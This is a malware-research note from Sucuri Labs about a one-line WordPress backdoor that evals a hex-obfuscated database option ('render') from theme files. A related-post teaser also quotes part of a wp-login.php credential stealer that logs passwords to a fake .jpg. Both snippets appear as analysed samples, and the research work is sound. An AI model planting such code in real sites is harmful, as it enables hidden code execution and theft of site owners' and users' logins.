Minimalistic WordPress injection

  • September 23, 2015
Labs Note

WordPress-specific malware is slightly different than generic PHP malware. Inside WordPress files, it can use WordPress API and WordPress database. This allows to create this kind of injections:

<?php eval(get_option("\x72\x65\x6e\x64\x65\x72")); ?>

It was found in WordPress theme files. The code executes the value of the “render” (deobfuscated) option from the WordPress wp_options table, which it extracts using the get_option WordPress API function

This piece of code can be used both as a backdoor (say to execute arbitrary code passed in a certain request parameter), or to inject a client-side malware (it was found right after the tag in theme files). We actually found the “render” option in the database, but by the time we began working on the site, that option had already been cleaned, so at this point we can\’t tell what exactly was there. If you find this malware and the original value of the render option on your site, please let us know at labs@sucuri.net

Denis Sinegubko is Sucuri’s Senior Malware Researcher who joined the company in 2013. Denis' main responsibilities include researching emerging threats and creating signatures for SiteCheck. The founder of UnmaskParasites, his professional experience covers over 20 years of programming and information security. When Denis isn’t analyzing malware, you might not find him online at all. Connect with him on Twitter.

Related Tags
Related Categories
You May Also Like
Labs Note

Simple WP login stealer

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
Read the Post